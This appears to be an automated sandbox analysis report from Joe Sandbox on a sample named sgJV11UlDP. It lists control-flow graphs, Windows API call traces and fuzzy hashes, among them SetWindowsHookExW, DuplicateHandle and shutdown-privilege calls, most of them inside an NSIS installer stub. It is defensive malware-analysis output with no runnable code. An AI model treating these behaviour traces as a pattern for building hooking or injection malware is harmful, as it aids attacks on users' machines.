                                                                      • Source File: 00000003.00000002.4105835176.00000000366E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 366E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_366e0000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 6949b78695ec310e37edbb81bd89f56f9f08cbdebca89fd3beb9248491616bfd
                                                                      • Instruction ID: 226e04a8b15709f6d26d9b64401c3f1a699b93bf5108324ea213d36488a5f65a
                                                                      • Opcode Fuzzy Hash: 6949b78695ec310e37edbb81bd89f56f9f08cbdebca89fd3beb9248491616bfd
                                                                      • Instruction Fuzzy Hash: 3C51E1B1D00309DFDB14CF9AD980ADEBBB6FF48350F60812AE819AB210D771A841CF91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 200 366e2918-366e297e 201 366e2989-366e2990 200->201 202 366e2980-366e2986 200->202 203 366e299b-366e2a3a CreateWindowExW 201->203 204 366e2992-366e2998 201->204 202->201 206 366e2a3c-366e2a42 203->206 207 366e2a43-366e2a7b 203->207 204->203 206->207 211 366e2a7d-366e2a80 207->211 212 366e2a88 207->212 211->212 213 366e2a89 212->213 213->213
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 366E2A2A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4105835176.00000000366E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 366E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_366e0000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 63950aea08bd148df844b666c0d422cc09a0cc0950885384a0a301180df982ae
                                                                      • Instruction ID: b922332ac2ce5f62d5b8331ea5a77b26415c256595e133ab4ae863eb425bebb8
                                                                      • Opcode Fuzzy Hash: 63950aea08bd148df844b666c0d422cc09a0cc0950885384a0a301180df982ae
                                                                      • Instruction Fuzzy Hash: 6641D1B1C00309DFDB14CF9AD980ADEBBB6BF48350F60812AE819AB210D775A841CF95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 214 366e3844-366e509c 217 366e514c-366e516c 214->217 218 366e50a2-366e50a7 214->218 224 366e516f-366e517c 217->224 219 366e50fa-366e5132 CallWindowProcW 218->219 220 366e50a9-366e50e0 218->220 221 366e513b-366e514a 219->221 222 366e5134-366e513a 219->222 227 366e50e9-366e50f8 220->227 228 366e50e2-366e50e8 220->228 221->224 222->221 227->224 228->227
                                                                      APIs
                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 366E5121
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4105835176.00000000366E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 366E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_366e0000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CallProcWindow
                                                                      • String ID:
                                                                      • API String ID: 2714655100-0
                                                                      • Opcode ID: be0e4185c1ed71eafc439b0421b371d27a5d3708506662f91fe50320b844814f
                                                                      • Instruction ID: 51f13f05f31ada45fce1026fce200e7a51429aad0658c37e0adf18aa6d729f01
                                                                      • Opcode Fuzzy Hash: be0e4185c1ed71eafc439b0421b371d27a5d3708506662f91fe50320b844814f
                                                                      • Instruction Fuzzy Hash: C14158B8A00309CFDB04CF99C984A9ABBF5FF88314F24C459E519AB321D775A841CFA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 230 157360-157365 231 157367-1573ca 230->231 232 1573cc-1573ce 230->232 231->232 233 1573d0-1573d5 232->233 234 1573d8-1573fc DuplicateHandle 232->234 233->234 235 157405-157422 234->235 236 1573fe-157404 234->236 236->235
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 001573EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075427376.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 6026d67023ae7dfabe70d810d8f36a2131e8515e17e6fd2032e98800cfc3eeb5
                                                                      • Instruction ID: 1ae66884649b5e7b5306e1711e7d83bc2c75a30bf4bbe21ba7124496f2efa5b9
                                                                      • Opcode Fuzzy Hash: 6026d67023ae7dfabe70d810d8f36a2131e8515e17e6fd2032e98800cfc3eeb5
                                                                      • Instruction Fuzzy Hash: 1C2105B5900349DFDB10CFAAE985ADEBBF4FB48320F14801AE914A7350D374A945CF61

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 239 157368-1573fc DuplicateHandle 241 157405-157422 239->241 242 1573fe-157404 239->242 242->241
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 001573EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075427376.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 267c58e458f562d838c04186b40092ee771ee47ca17d5f15035696907e14bd30
                                                                      • Instruction ID: e9a716f41df334e2aaae2c08544ed6d77d39f9b08c1c8d2b06f67d177e2b47d7
                                                                      • Opcode Fuzzy Hash: 267c58e458f562d838c04186b40092ee771ee47ca17d5f15035696907e14bd30
                                                                      • Instruction Fuzzy Hash: 1421C4B5900249DFDB10CFAAD984ADEFBF4FB48320F14841AE954A7350D378A954CF65

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 245 152260-1522b2 247 1522b4-1522bc 245->247 248 1522be-1522f0 SetWindowsHookExW 245->248 247->248 249 1522f2-1522f8 248->249 250 1522f9-15231e 248->250 249->250
                                                                      APIs
                                                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 001522E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075427376.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: HookWindows
                                                                      • String ID:
                                                                      • API String ID: 2559412058-0
                                                                      • Opcode ID: c372f5a869413d2fbc86cefba354eeb9d168803727460ae6eed201786008d793
                                                                      • Instruction ID: db70395b7461135749a70578a152b2c4e45c58a686c9461e4de76d76102081f3
                                                                      • Opcode Fuzzy Hash: c372f5a869413d2fbc86cefba354eeb9d168803727460ae6eed201786008d793
                                                                      • Instruction Fuzzy Hash: B42132759042498FDB14DFAAD844BEEBBF5AF88310F14842ED869A7250CB74A944CFA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 255 152268-1522b2 257 1522b4-1522bc 255->257 258 1522be-1522f0 SetWindowsHookExW 255->258 257->258 259 1522f2-1522f8 258->259 260 1522f9-15231e 258->260 259->260
                                                                      APIs
                                                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 001522E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075427376.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: HookWindows
                                                                      • String ID:
                                                                      • API String ID: 2559412058-0
                                                                      • Opcode ID: abebfbb0ed268716f8b6403e444dc76563e039eee298a832b1ead9c5f27f8a2e
                                                                      • Instruction ID: 2f67bd1b7fc63122d8c09be703e48138b1c29ba3ef830a28f7539b81fbfe8f7e
                                                                      • Opcode Fuzzy Hash: abebfbb0ed268716f8b6403e444dc76563e039eee298a832b1ead9c5f27f8a2e
                                                                      • Instruction Fuzzy Hash: 382115759002099FDB14DFAAD844BEEBBF5AF89310F10842AD825A7250CB74A944CFA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075216911.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_9d000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4e8fc61a57ebaac2953d6cdaf6dbb69f4706aa87658f795db9e21bb89d5f128
                                                                      • Instruction ID: 889eebcb2ff99dc36ba1a5651b9f4397eab0c9815c5ba47b3601e7ff8c761c6c
                                                                      • Opcode Fuzzy Hash: a4e8fc61a57ebaac2953d6cdaf6dbb69f4706aa87658f795db9e21bb89d5f128
                                                                      • Instruction Fuzzy Hash: CF212871544704DFDF15DF14D9C0B26BFA1FB98318F24C16AD9090B246C336D856EBA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075269379.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ad000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 464175d8aed486b8b675425c9389c14c2fafbece37b7f94d5ef5a6e3bf9c0ca2
                                                                      • Instruction ID: 7957376683fc958f3e02f84214043001347d272bd3fa22ff6579ff3969f547a1
                                                                      • Opcode Fuzzy Hash: 464175d8aed486b8b675425c9389c14c2fafbece37b7f94d5ef5a6e3bf9c0ca2
                                                                      • Instruction Fuzzy Hash: 282134B5604304EFDB04DF50D9C4B26BBA1FB89324F20C56ED80A4B642C33AD846CB62
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075216911.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_9d000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af70f5d0e204b3cef50fd046a4430efce4a1d26e17c50e76bd06a63e610ddebd
                                                                      • Instruction ID: cd19b5d0ccce76c1516a20072c057b8c9dbc10f709e1bbd5280db79ce62703b5
                                                                      • Opcode Fuzzy Hash: af70f5d0e204b3cef50fd046a4430efce4a1d26e17c50e76bd06a63e610ddebd
                                                                      • Instruction Fuzzy Hash: 4511E176544644CFCF11CF10D5C0B16BFA2FB84324F24C2AAD8490B256C33AD856DBA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075269379.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ad000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9739b480a0bb4769e2d86e11a7df88a0109680c19479200658544855149774ec
                                                                      • Instruction ID: 245594cd1fa9db55432403e9cf1f4456f908e9da80c73ae94210d4a104d8d072
                                                                      • Opcode Fuzzy Hash: 9739b480a0bb4769e2d86e11a7df88a0109680c19479200658544855149774ec
                                                                      • Instruction Fuzzy Hash: 5C11D075504244DFDB05CF50D9C4B15BFB1FB45324F24C6AED84A4B656C33AD84ACB51
                                                                      APIs
                                                                        • Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                        • Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032A6
                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032E2
                                                                      • OleInitialize.OLE32(00000000), ref: 004032E9
                                                                      • SHGetFileInfoA.SHELL32(0079E508,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403305
                                                                      • GetCommandLineA.KERNEL32(007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 0040331A
                                                                      • CharNextA.USER32(00000000,007A9000,00000020,007A9000,00000000,?,00000006,00000008,0000000A), ref: 00403356
                                                                      • GetTempPathA.KERNEL32(00000400,007AA400,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
                                                                      • GetWindowsDirectoryA.KERNEL32(007AA400,000003FB,?,?,00000160), ref: 00403464
                                                                      • lstrcatA.KERNEL32(007AA400,\Temp,?,?,00000160), ref: 00403470
                                                                      • GetTempPathA.KERNEL32(000003FC,007AA400,007AA400,\Temp,?,?,00000160), ref: 00403484
                                                                      • lstrcatA.KERNEL32(007AA400,Low,?,?,00000160), ref: 0040348C
                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,007AA400,007AA400,Low,?,?,00000160), ref: 0040349D
                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,007AA400,?,?,00000160), ref: 004034A5
                                                                      • DeleteFileA.KERNEL32(007AA000,?,00000006,00000008,0000000A), ref: 004034B9
                                                                      • OleUninitialize.OLE32(?,?,?,00000160), ref: 00403567
                                                                      • ExitProcess.KERNEL32 ref: 00403588
                                                                      • lstrcatA.KERNEL32(007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 0040359B
                                                                      • lstrcatA.KERNEL32(007AA400,0040A14C,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035AA
                                                                      • lstrcatA.KERNEL32(007AA400,.tmp,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035B5
                                                                      • lstrcmpiA.KERNEL32(007AA400,007A9C00), ref: 004035C1
                                                                      • SetCurrentDirectoryA.KERNEL32(007AA400,007AA400,?,?,?,?,00000160), ref: 004035DD
                                                                      • DeleteFileA.KERNEL32(0079E108,0079E108,?,007A4000,?,?,?,?,?,00000160), ref: 00403636
                                                                      • CopyFileA.KERNEL32(007AAC00,0079E108,?), ref: 0040364A
                                                                      • CloseHandle.KERNEL32(00000000,0079E108,0079E108,?,0079E108,?,?,?,?,?,00000160), ref: 00403677
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,00000160), ref: 004036A5
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
                                                                      • LookupPrivilegeValueA.ADVAPI32(?,SeShutdownPrivilege,?), ref: 004036C4
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,?,?,?,?,?,SeShutdownPrivilege,?), ref: 004036E3
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
                                                                      • ExitProcess.KERNEL32 ref: 0040372A
                                                                        • Part of subcall function 004059B0: CharNextA.USER32(?,00403355,007A9000,00000020,007A9000,00000000,?,00000006,00000008,0000000A), ref: 004059BD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcat$FileProcess$Exit$CharCurrentDeleteDirectoryEnvironmentHandleNextPathTempTokenVariableWindows$AddressAdjustCloseCommandCopyInfoInitializeLineLookupModuleOpenPrivilegePrivilegesProcUninitializeValuelstrcmpilstrlen
                                                                      • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Vx+$\Temp$`KXu$~nsu
                                                                      • API String ID: 626260513-1400013141
                                                                      • Opcode ID: f7d9469de542fe56ff305c7c8b091c3c8799d7bb7494c8b2633f7a123844b828
                                                                      • Instruction ID: 8af8fcedd10493f8e80c4eada79d0bae115e97f9cb4a2bc1da61e0caac86d092
                                                                      • Opcode Fuzzy Hash: f7d9469de542fe56ff305c7c8b091c3c8799d7bb7494c8b2633f7a123844b828
                                                                      • Instruction Fuzzy Hash: 0F91E270144741BAD7106F759D49E2F3EACAF8630AF05043EF581B61E2DB7C8A158B2E
                                                                      APIs
                                                                      • DeleteFileA.KERNEL32(?,?), ref: 004057DE
                                                                      • lstrcatA.KERNEL32(007A0550,\*.*,007A0550,?,?), ref: 00405826
                                                                      • lstrcatA.KERNEL32(?,0040A014,?,007A0550,?,?), ref: 00405847
                                                                      • lstrlenA.KERNEL32(?,?,0040A014,?,007A0550,?,?), ref: 0040584D
                                                                      • FindFirstFileA.KERNEL32(007A0550,?,?,?,0040A014,?,007A0550,?,?), ref: 0040585E
                                                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040590B
                                                                      • FindClose.KERNEL32(00000000), ref: 0040591C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: \*.*
                                                                      • API String ID: 2035342205-1173974218
                                                                      • Opcode ID: 431781be1718a0d33c081e233ae80cc558f5881f14e6cb9e5308166eef8fd087
                                                                      • Instruction ID: eea8dcc9899e8fe382e67b4d85d328ba4a3fbbae0ab86688a1659871ceec6938
                                                                      • Opcode Fuzzy Hash: 431781be1718a0d33c081e233ae80cc558f5881f14e6cb9e5308166eef8fd087
                                                                      • Instruction Fuzzy Hash: 4051E171800A08FADF226B618C45FAF7A78DF42728F14807BF841B51D2D73C4992DE69
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404A97
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404AA4
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AF3
                                                                      • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404B0A
                                                                      • SetWindowLongA.USER32(?,000000FC,00405088), ref: 00404B24
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B36
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B4A
                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404B60
                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6C
                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B7C
                                                                      • DeleteObject.GDI32(00000110), ref: 00404B81
                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAC
                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BB8
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C52
                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C82
                                                                        • Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,?,00403EE0), ref: 004040BE
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C96
                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404CC4
                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CD2
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404CE2
                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DDD
                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E42
                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E57
                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E7B
                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E9B
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404EB0
                                                                      • GlobalFree.KERNEL32(?), ref: 00404EC0
                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F39
                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404FE2
                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FF1
                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 00405011
                                                                      • ShowWindow.USER32(?,00000000), ref: 0040505F
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040506A
                                                                      • ShowWindow.USER32(00000000), ref: 00405071
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 2564846305-813528018
                                                                      • Opcode ID: 4399c830adbd7d59991cca11517547b5d533efcb757e40cb4398398cc859d0e5
                                                                      • Instruction ID: a268e52f59abad667f40846b9330857a26eef97fbfd8c04b7b0b2c1eeebe026e
                                                                      • Opcode Fuzzy Hash: 4399c830adbd7d59991cca11517547b5d533efcb757e40cb4398398cc859d0e5
                                                                      • Instruction Fuzzy Hash: 56026DB0900209EFEB109FA8DD45AAE7BB5FB84314F10813AF610B62E1D7789D52DF58
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 004052B1
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004052C0
                                                                      • GetClientRect.USER32(?,?), ref: 004052FD
                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405304
                                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405325
                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405336
                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405349
                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405357
                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040536A
                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040538C
                                                                      • ShowWindow.USER32(?,00000008), ref: 004053A0
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004053C1
                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053D1
                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053EA
                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F6
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004052CF
                                                                        • Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,?,00403EE0), ref: 004040BE
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405412
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000051E6,00000000), ref: 00405420
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405427
                                                                      • ShowWindow.USER32(00000000), ref: 0040544A
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405451
                                                                      • ShowWindow.USER32(00000008), ref: 00405497
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054CB
                                                                      • CreatePopupMenu.USER32 ref: 004054DC
                                                                      • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004054F1
                                                                      • GetWindowRect.USER32(?,000000FF), ref: 00405511
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040552A
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405566
                                                                      • OpenClipboard.USER32(00000000), ref: 00405576
                                                                      • EmptyClipboard.USER32 ref: 0040557C
                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405585
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040558F
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004055A3
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004055BC
                                                                      • SetClipboardData.USER32(?,00000000), ref: 004055C7
                                                                      • CloseClipboard.USER32 ref: 004055CD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075775056.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID:
                                                                      • API String ID: 590372296-0
                                                                      • Opcode ID: 84782df16d7ec059bf83c821ddbfeaa0f78f9d0c9a83925ce920f2e68e6ea0e3
                                                                      • Instruction ID: e249d6b51738ec221da1a53d9ec42c2df55930041f70e6241115b0d1b6ef0d10
                                                                      • Opcode Fuzzy Hash: 84782df16d7ec059bf83c821ddbfeaa0f78f9d0c9a83925ce920f2e68e6ea0e3
                                                                      • Instruction Fuzzy Hash: D0A15AB1900608BFDF119F64DD85EAF7BB9FB48344F10802AFA41B61A1CB794E519F68
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BE3
                                                                      • ShowWindow.USER32(?), ref: 00403C00
                                                                      • DestroyWindow.USER32 ref: 00403C14
                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C30
                                                                      • GetDlgItem.USER32(?,?), ref: 00403C51
                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C65
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403C6C
                                                                      • GetDlgItem.USER32(?,?), ref: 00403D1A
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403D24
                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403D3E
                                                                      • SendMessageA.USER32(0000040F,00000000,?), ref: 00403D8F
                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403E35
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403E56
                                                                      • EnableWindow.USER32(?,?), ref: 00403E68
                                                                      • EnableWindow.USER32(?,?), ref: 00403E83
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E99
                                                                      • EnableMenuItem.USER32(00000000), ref: 00403EA0
                                                                      • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403EB8
                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403ECB
                                                                      • lstrlenA.KERNEL32(0079F548,?,0079F548,00000000), ref: 00403EF5
                                                                      • SetWindowTextA.USER32(?,0079F548), ref: 00403F04
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404038
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.4075536589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.4075521092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075552184.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.4075573829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
